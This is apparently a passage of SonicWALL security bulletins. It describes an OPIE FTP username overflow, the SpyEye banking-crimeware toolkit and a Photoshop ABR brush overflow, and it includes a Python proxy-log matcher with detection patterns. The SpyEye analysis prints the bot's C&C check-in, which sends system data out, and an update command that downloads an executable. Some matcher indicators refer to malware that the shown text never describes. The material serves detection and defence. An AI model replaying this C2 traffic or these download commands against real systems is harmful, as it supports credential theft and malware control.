File Transfer Protocol (FTP) is a standard network protocol used to copy files from one host to another over a TCP/IP-based network. The protocol is defined in RFC 959. A successful FTP transfer uses a control connection and a data connection; all commands exchanged between server and client travel over the control connection. Typical control traffic looks like this:

Response: 220-FileZilla Server version 0.9.29 beta
Response: 220-written by Tim Kosse (Tim.Kosse@gmx.de)
Response: 220 Please visit http://sourceforge.net/projects/filezilla/
Command:  USER user
Response: 331 Password required for user
Command:  PASS *********
Response: 230 Logged on

One of the commands included in the FTP protocol is the USER command. This command is used to begin the login process, which can be found in the above example. When an FTP server is using the OPIE package, it will pass on the value of the username field to the package for processing.

A buffer overflow vulnerability exists in OPIE. It is due to an off-by-one error in the username-handling function when processing the value of the username field of the USER command. Specifically, the vulnerable code truncates the username to at most 32 bytes, copies it into a fixed 32-byte buffer, and then appends a NUL terminator after it; when the name is a full 32 bytes long, that terminator overwrites the byte immediately following the buffer. Successful exploitation could result in execution of arbitrary code with root privileges.

SonicWALL UTM team has researched this vulnerability, and covers the exploits with the following IPS signatures:

  • 30 USER Command BO Attempt
  • 4598 Generic Server Application Buffer Overflow Exploit 3

This vulnerability is referred by CVE as CVE-2010-1938.

SpyEye crimeware toolkit (May 28, 2010)

SonicWALL UTM Research team has been continuously monitoring newer variants of the SpyEye bots in the wild. In our detailed analysis of the SpyEye crimeware toolkit we found it to be very similar to Zeus in terms of functionality and features.

SpyEye is a web-based crimeware toolkit first released in early January 2010 on underground forums. It is written in C++; the compiled bot was approximately 60KB in the first version, and newer versions add compression options that reduce the binary to ~40KB. Like Zeus, the bot's main objective is to steal financial information, including banking credentials and credit card numbers, as well as other sensitive information from the victim machine.

SpyEye has many interesting features, listed below; the most notable is its ability to kill an existing Zeus infection on the victim machine. This feature was not originally present and was added from version 1.0.7 onwards. Like Zeus, the bot runs in user mode (ring 3) and hides itself from Task Manager, Explorer and other user-mode monitoring applications. The screenshot below shows the SpyEye v1.0.7 toolkit in action:

screenshot

SpyEye version 1.0.7 toolkit features:

  • Formgrabber – Supports logging web form data for browsers like IE, Firefox, and Netscape.
  • Credit Card AutoFill module – Automates the process of getting money from stolen credit cards.
  • Steal FTP, POP3 & HTTP basic authorization accounts.
  • Daily e-mail backup.
  • Feature to kill Zeus bot infection.
  • UPX compression & encrypted configuration file.
  • Web-based control panel (PHP & MYSQL based).
  • Ability to detect and clean SpyEye infection.

The build and configuration file generated by the tool kit can be seen here:

screenshot

Screenshot of SpyEye web control panel main page:

screenshot

Screenshot showing the status of various bots and tasks (posted by the author):

screenshot

Network traffic generated by the BOT

  • The bot sends the following request, containing system information, to the C&C server upon successful infection of the victim machine:

    GET /gate.php?guid=USERNAME!COMPUTERNAME!24B5EF92&ver=10120&stat=ONLINE&ie=7.0.5730.13&os=5.1.2600&ut=Admin&cpu=19&ccrc=2F9360E0&md5=b97f34389d7e16b2ff9868ae1130b628

  • A sample command received from the C&C server, instructing the bot to update itself:

    UPDATE
    PATH=http://(REMOVED)/bin/ups.exe [Detected as GAV: SpyEye.AI (Trojan)]
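The check-in above, the Facebook malware's message.php and setup.php requests, the Desktop Security 2010 getfile.php download and the /ms03/ad and /ms04/ad paths of the Rogue AV downloaders are all plain HTTP and will be in a web proxy log if the organisation keeps one. The matcher below is an added example, not SonicWALL code: it applies one pattern per indicator to constructed log lines in a simple "time source method url status" layout and splits the SpyEye guid into its three fields. The hostnames the bulletin redacts are replaced with .example placeholders, the query values the page marks (REMOVED) are written as REDACTED, and the SpyEye query string is the one printed above.

```python
"""Proxy-log matcher for the HTTP indicators in this bulletin.

Added example, not SonicWALL code.  Covers the SpyEye gate.php check-in,
the Facebook malware's message.php/setup.php traffic, the Desktop Security
2010 getfile.php download and the /ms03/ad and /ms04/ad Rogue AV downloader
paths.  Log lines are constructed; redacted hosts are .example placeholders.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")

# (rule name, pattern applied to the full URL).  Each pattern is anchored on
# the path and the first query parameters so that ordinary pages that merely
# contain a similar word do not match.
INDICATORS = [
    ("spyeye-checkin",
     re.compile(r"/gate\.php\?guid=[^!&]+![^!&]+![0-9A-Fa-f]{8}&ver=")),
    ("fb-malware-c2",
     re.compile(r"/ab/setup\.php\?act=(?:filters|data)(?:&|$)"
                r"|/message\.php\?subid=\d+&version=")),
    ("desktop-security-dl", re.compile(r"/getfile\.php\?r=\w{10}&p=")),
    ("rogue-av-downloader", re.compile(r"/ms0[34]/ad(?:$|[?/])")),
]


def parse_spyeye_checkin(url: str) -> Optional[Dict[str, str]]:
    """Split the gate.php query into the fields the bulletin's sample shows."""
    q = parse_qs(urlsplit(url).query)
    first = lambda k: q.get(k, [""])[0]
    parts = first("guid").split("!")          # USERNAME!COMPUTERNAME!<8 hex digits>
    if len(parts) != 3:
        return None
    return {"user": parts[0], "computer": parts[1], "id": parts[2],
            "ver": first("ver"), "stat": first("stat"), "os": first("os"),
            "ie": first("ie"), "md5": first("md5")}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """One hit per matching line: rule, source address, URL and parsed SpyEye fields."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                           # not in the expected layout
        _ts, src, _method, url, _status = m.groups()
        for rule, pattern in INDICATORS:
            if pattern.search(url):
                hit: Dict[str, object] = {"rule": rule, "src": src, "url": url}
                if rule == "spyeye-checkin":
                    hit["spyeye"] = parse_spyeye_checkin(url)
                hits.append(hit)
                break                          # first matching rule wins
    return hits


# Constructed log lines.  The last two are benign look-alikes that must not match.
SAMPLE_LOG = [
    "2010-05-28T09:12:01 10.0.0.21 GET http://c2.example/gate.php?guid=USERNAME!COMPUTERNAME!24B5EF92&ver=10120&stat=ONLINE&ie=7.0.5730.13&os=5.1.2600&ut=Admin&cpu=19&ccrc=2F9360E0&md5=b97f34389d7e16b2ff9868ae1130b628 200",
    "2010-06-18T14:03:10 10.0.0.35 GET http://smartcontrol.info/message.php?subid=284&version=_nn2&id=REDACTED 200",
    "2010-06-18T14:03:11 10.0.0.35 POST http://spmfb3309.com/ab/setup.php?act=data 200",
    "2010-05-06T11:40:22 10.0.0.40 GET http://securehttpss.com/getfile.php?r=0123456789&p=REDACTED= 200",
    "2010-06-25T08:15:43 10.0.0.52 GET http://kol.example/ms04/ad 200",
    "2010-06-25T08:16:00 10.0.0.52 GET http://cdn.example/ms04/adverts.js 200",
    "2010-06-25T08:16:05 10.0.0.52 GET http://www.example.com/forum/setup.php?act=data 200",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["rule"], hit["src"], hit["url"])
```

Two things to keep in mind when moving this onto real logs: a proxy may percent-encode the "!" separators in the SpyEye guid (as %21), so normalise the URL before matching; and the source address is what turns a hit into a host to pull for triage, which is why it is carried in every hit.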

The SpyEye toolkit is currently offered on underground forums for $500, with extra charges for newer features. It is continuously updated with more sophisticated features and is a potential contender to surpass Zeus as the leading crimeware toolkit.

SonicWALL Gateway AntiVirus provides protection against SpyEye bot via GAV: SpyeEye.KD (Trojan), GAV: SpyEyes.DG_2 (Trojan) and GAV: Suspicious#spyeye (Trojan) signatures.

Adobe Photoshop ABR BO (May 28, 2010)

Adobe Photoshop is a multi-platform graphics editor developed and published by Adobe Systems. Adobe Photoshop is capable of handling numerous types of image file formats. One of the formats it can handle is ABR. ABR is a proprietary file format which describes Adobe Photoshop brushes. An ABR file contains multiple structures describing a Photoshop brush. One of the structures contained is BrshObjc which contains the description of a brush stored in the following format:

Size      Name       Field
-------------------------------------------------
12 bytes  DmtrUntF   Diameter
12 bytes  HrdnUntF   Hardness
12 bytes  AnglUntF   Angle
12 bytes  RndnUntF   Roundness
12 bytes  SpcnUntF   Spacing
4 bytes   Intrbool   Interface
4 bytes   flipXbool  flipX
4 bytes   flipYbool  flipY

A buffer overflow vulnerability exists in Adobe Photoshop. It is due to insufficient validation of the size of the AnglUntF structure: the vulnerable code uses the size value supplied in the AnglUntF field as the length parameter to strncpy and copies that many bytes into a fixed-size heap buffer. The vulnerability can also be exploited via numerous other file types that contain a brush definition.

In order to exploit this vulnerability remotely, an attacker must entice the target user to download and view a malicious file. Successful exploitation will result in a buffer overflow which may lead to process flow diversion within the context of the currently logged in user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.

SonicWall has released an IPS signature to address a specific exploit targeting this vulnerability. The following signature has been released:

  • 5552 – Adobe Photoshop CS4 ABR File BO PoC

The vendor has released an advisory regarding this issue. The vulnerability has been assigned CVE-2010-1296 by MITRE.